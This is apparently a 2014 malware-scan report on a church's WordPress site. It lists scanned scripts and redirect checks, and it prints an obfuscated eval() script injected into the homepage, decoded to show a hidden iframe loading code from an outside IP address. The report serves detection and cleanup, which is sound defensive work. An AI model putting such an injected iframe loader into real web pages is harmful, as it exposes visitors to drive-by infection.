Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=parisfirstumc.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://parisfirstumc.com/ | 200 OK Content-Length: 36215 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|134||src|height|249|width|board||231|php|235|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://134.249.235.231/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://134.249.235.231/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://134.249.235.231/tag1.php"></ifee> | ||
http://parisfirstumc.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://parisfirstumc.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://parisfirstumc.com/wp-content/plugins/photo-gallery/js/bwg_frontend.js?ver=1.2.7 | 200 OK Content-Length: 3757 Content-Type: application/x-javascript | clean |
http://parisfirstumc.com/wp-content/plugins/photo-gallery/js/jquery.mobile.js?ver=1.2.7 | 200 OK Content-Length: 6419 Content-Type: application/x-javascript | clean |
http://parisfirstumc.com/wp-content/plugins/photo-gallery/js/jquery.mCustomScrollbar.concat.min.js?ver=1.2.7 | 200 OK Content-Length: 25171 Content-Type: application/x-javascript | clean |
http://parisfirstumc.com/wp-content/plugins/photo-gallery/js/jquery.fullscreen-0.4.1.js?ver=0.4.1 | 200 OK Content-Length: 7583 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { function defined(a) { return typeof a !== 'undefined'; } function extend(child, parent, prototype) { var F = function() {}; F.prototype = parent.prototype; child.prototype = new F(); child.prototype.constructor = child; parent.prototype.constructor = parent; child._super = parent.prototype; if (prototype) { $.extend(child.prototype, prototype); } } var SUBST = [ ['', ''], element: function() { return this.__isFullScreen ? this._fullScreenElement : null; } });$.fullscreen = IS_NATIVELY_SUPPORTED ? new FullScreenNative() : new FullScreenFallback(); $.fn.fullscreen = function(options) { var elem = this[0]; options = $.extend({ toggleClass: null, }, options); options.styles = { }; if (elem) { $.fullscreen.open(elem, options); } return this; }; })(jQuery); Antivirus reports:
| ||
http://parisfirstumc.com/wp-content/plugins/photo-gallery/js/bwg_gallery_box.js?ver=1.2.7 | 200 OK Content-Length: 6698 Content-Type: application/x-javascript | clean |
http://parisfirstumc.com/wp-content/themes/catch-box/js/html5.min.js?ver=4.0.1 | 200 OK Content-Length: 2496 Content-Type: application/x-javascript | clean |
http://parisfirstumc.com/wp-content/plugins/spider-event-calendar/elements/calendar.js?ver=4.0.1 | 200 OK Content-Length: 36556 Content-Type: application/x-javascript | clean |
http://parisfirstumc.com/wp-content/plugins/spider-event-calendar/elements/calendar-setup.js?ver=4.0.1 | 200 OK Content-Length: 4919 Content-Type: application/x-javascript | clean |
http://parisfirstumc.com/wp-content/plugins/spider-event-calendar/elements/calendar_function.js?ver=4.0.1 | 200 OK Content-Length: 15039 Content-Type: application/x-javascript | clean |
http://parisfirstumc.com/wp-content/plugins/spider-event-calendar/jscolor/jscolor.js?ver=4.0.1 | 200 OK Content-Length: 26022 Content-Type: application/x-javascript | clean |
https://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 160540 Content-Type: application/x-javascript | clean |
http://parisfirstumc.com/wp-content/plugins/custom-facebook-feed/js/cff-scripts.js?10&ver=1.9 | 200 OK Content-Length: 3367 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: parisfirstumc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 03:24:14 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.9 Resin/3.1.10 Sun-ONE-ASP/4.0.3
Content-Type: text/html; charset=UTF-8
Link: <http://parisfirstumc.com/>; rel=shortlink
X-Pingback: http://parisfirstumc.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: parisfirstumc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 03:24:14 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.9 Resin/3.1.10 Sun-ONE-ASP/4.0.3
Content-Type: text/html; charset=UTF-8
Link: <http://parisfirstumc.com/>; rel=shortlink
X-Pingback: http://parisfirstumc.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: parisfirstumc.com
Referer: http://www.google.com/search?q=parisfirstumc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: parisfirstumc.com
Referer: http://www.google.com/search?q=parisfirstumc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.